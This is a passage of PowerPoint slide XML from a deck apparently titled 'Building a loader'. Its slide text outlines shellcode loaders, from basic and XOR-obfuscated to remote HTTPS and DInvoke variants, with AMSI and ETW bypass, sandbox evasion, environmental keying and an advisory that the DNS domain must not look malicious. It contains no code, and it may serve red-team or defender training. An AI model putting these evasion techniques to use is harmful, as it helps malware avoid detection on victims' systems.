              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3570683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8A603-496C-B39E-80CA-E1FE51D4680B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Building a loader</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21B985E-F8EF-E6A0-B20C-F95A5990892C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>BASIC Loader (embedded shellcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>XOR Loader (embedded XOR Shellcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>Remote Loader (HTTPS + Remote XOR Binary)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>DINVOKE X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>oader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>DINVOKE Patched X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>oader (AMSI + ETW patch – SLEEP – SANDBOX EVASION)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" b="1"/>
              <a:t>Key derivation instead of downloading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>: Derive the XOR key dynamically using environmental factors (e.g., system-specific data like MAC address, CPUID, or a hash of the process) or a pre-shared seed. This avoids network calls while keeping the key dynamic and non-hardcoded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>DNS Query : domain can’t be malicious (same for payload)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197157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16E72-E009-E8AC-BED1-21DCFBC4DDF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-BE"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA0164A-D539-FAD1-7E88-6F513BCC65C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1247820" y="2094750"/>
            <a:ext cx="3693042" cy="1600438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>BASIC LOADER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACBE76D-A049-FBFE-3541-67434CFFEDCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334053" y="2398286"/>
            <a:ext cx="1814920" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>EMBEDDED SHELLCODE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="800"/>
              <a:t>UNENCRYPTED/NOT OBFUSCATED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90BD196A-D0A7-A197-E16F-A7426C303613}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3955657" y="1725418"/>
            <a:ext cx="1047082" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE"/>
              <a:t>CSHARP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E2A31A-4C15-922E-82C4-8C3AB3A4CC51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334053" y="2805466"/>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FUNCTIONS</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAEA3C2E-5748-9252-C434-28BE8CD9DE34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5404619" y="2094750"/>
            <a:ext cx="2244080" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>BASIC XOR LOADER</a:t>
            </a:r>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9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BD44561-F144-5EF5-AEED-AB9BC931B255}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5490852" y="2398286"/>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0" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A2DCEDB-8321-CAEE-93A3-B378B3D55401}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5490852" y="3383744"/>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14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{617AD330-2556-CF42-A02B-B1AB6B0A8578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5490852" y="3089536"/>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15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5AFB29A-1496-768F-57D8-5584C292523E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5490852" y="2805466"/>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17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DF8F5B3-DA57-E57A-95A3-2F3682BAAC14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1247820" y="4347170"/>
            <a:ext cx="3693042" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>BASIC XOR EVASIVE LOADER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFBFFDB3-D219-50F0-E243-A3936F11B3C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334053" y="4650706"/>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19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F22397E7-65D4-2E89-109C-16EB8880DB6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334053" y="6154321"/>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0" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A053B2-FEAB-7707-368B-C6A8B68E1476}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334053" y="5817590"/>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1" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77590308-65B0-A098-7876-9E77E1C44318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334053" y="5541503"/>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2" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCFC6B54-2CE3-F044-96D4-1D84372D2D0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334053" y="5042831"/>
            <a:ext cx="819455" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>AMSI BYPASS</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF004F83-453C-4D98-F055-8E97C8E33658}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334053" y="5300178"/>
            <a:ext cx="785793" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>ETW BYPASS</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B219F1A-E0F6-9700-DB46-1DAAB4F31019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5928978" y="4338439"/>
            <a:ext cx="3693042" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1400" b="1"/>
              <a:t>ENV&gt; KEYING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25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1D46CD1-05B9-28D6-BBBE-E99CADA0FE3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6015211" y="4649679"/>
            <a:ext cx="1552028" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D69AF7-14D9-32D6-823F-AE6BD54319F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6015211" y="6146623"/>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27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC3A2086-520B-89E1-8072-C5AA672DDEBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6015211" y="5852415"/>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28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A9989E1-1E77-4D7B-731B-F6286AB19D2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6015211" y="5080546"/>
            <a:ext cx="1156086" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>EMBEDDED XOR KEY</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E07F506B-75B2-77FE-2493-A283336E8D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6015211" y="5453217"/>
            <a:ext cx="949299" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>DOMAIN CHECK</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECD5E395-DA28-BBF7-D05F-381AF2B37656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9822140" y="2020635"/>
            <a:ext cx="2244080" cy="2431435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="50000"/>
              <a:lumOff val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="1200" b="1"/>
              <a:t>OBFUSCATED XOR LOADER</a:t>
            </a:r>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b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-BE" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B25798-3561-ACF8-C39E-673BC9B4B7E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9908373" y="2944102"/>
            <a:ext cx="1552028" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>EMBEDDED </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t> SHELLCODE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="800"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="800"/>
              <a:t>XOR OBFUSCATED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F5A99A8-848B-CA3D-364E-C7B93791A067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9908373" y="3929560"/>
            <a:ext cx="1814920" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>SHELLCODE MEMORY INJECTION </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-BE" sz="800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>AND EXECUTION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FUNCTIONS</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72765783-7205-49F5-6761-EF6BD1CE2A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9908373" y="3635352"/>
            <a:ext cx="1814920" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1"/>
              <a:t>XOR DEOBFUSCATION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-BE" sz="800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FUNCTIONS</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="800">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
